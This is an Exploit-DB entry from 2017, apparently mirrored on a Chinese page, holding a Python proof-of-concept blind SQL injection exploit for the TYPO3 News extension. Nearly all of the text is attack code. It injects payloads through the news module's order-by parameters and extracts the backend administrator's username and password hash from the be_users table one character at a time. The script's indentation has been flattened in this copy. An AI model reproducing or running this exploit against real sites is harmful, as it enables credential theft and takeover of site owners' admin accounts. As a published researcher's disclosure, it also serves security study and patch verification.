TYPO3 Extension News – SQL Injection

• Exploit Database
• 33 阅读

• 作者： Charles Fol
  日期： 2017-04-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41940/

• # Exploit Title: TYPO3 News Module SQL Injection
  # Vendor Homepage: https://typo3.org/extensions/repository/view/news
  # Exploit Author: Charles FOL
  # Contact: https://twitter.com/ambionics
  # Website: https://www.ambionics.io/blog/typo3-news-module-sqli
  
  
  #!/usr/bin/python3
  
  # TYPO3 News Module SQL Injection Exploit
  # https://www.ambionics.io/blog/typo3-news-module-sqli
  # cf
  #
  # The injection algorithm is not optimized, this is just meant to be a POC.
  #
  
  import requests
  import string
  
   
  session = requests.Session()
  session.proxies = {'http': 'localhost:8080'}
  
  
  # Change this
  URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
  PATTERN0 = 'Article #1'
  PATTERN1 = 'Article #2'
  
  FULL_CHARSET = string.ascii_letters + string.digits + '$./'
  
  
  def blind(field, table, condition, charset):
  
  # We add 9 so that the result has two digits
  
  # If the length is superior to 100-9 it won't work
  
  size = blind_size(
  
  'length(%s)+9' % field, table, condition,
  
  2, string.digits
  
  )
  
  size = int(size) - 9
  
  data = blind_size(
  
  field, table, condition,
  
  size, charset
  
  )
  
  return data
  
  
  def select_position(field, table, condition, position, char):
  
  payload = 'select(%s)from(%s)where(%s)' % (
  
  field, table, condition
  
  )
  
  payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)
  
  payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (
  
  payload, ord(char)
  
  )
  
  return payload
  
  
  def blind_size(field, table, condition, size, charset):
  
  string = ''
  
  for position in range(size):
  
  for char in charset:
  
  payload = select_position(field, table, condition, position+1, char)
  
  if test(payload):
  
  string += char
  
  print(string)
  
  break
  
  else:
  
  raise ValueError('Char was not found')
  
   
  
  return string
  
  
  def test(payload):
  
  response = session.post(
  
  URL,
  
  data=data(payload)
  
  )
  
  response = response.text
  
  return response.index(PATTERN0) < response.index(PATTERN1)
  
  def data(payload):
  
  return {
  
  'tx_news_pi1[overwriteDemand][order]': payload,
  
  'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,
  
  'tx_news_pi1[search][subject]': '',
  
  'tx_news_pi1[search][minimumDate]': '2016-01-01',
  
  'tx_news_pi1[search][maximumDate]': '2016-12-31',
  
  }
  
  # Exploit
  
  print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
  print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))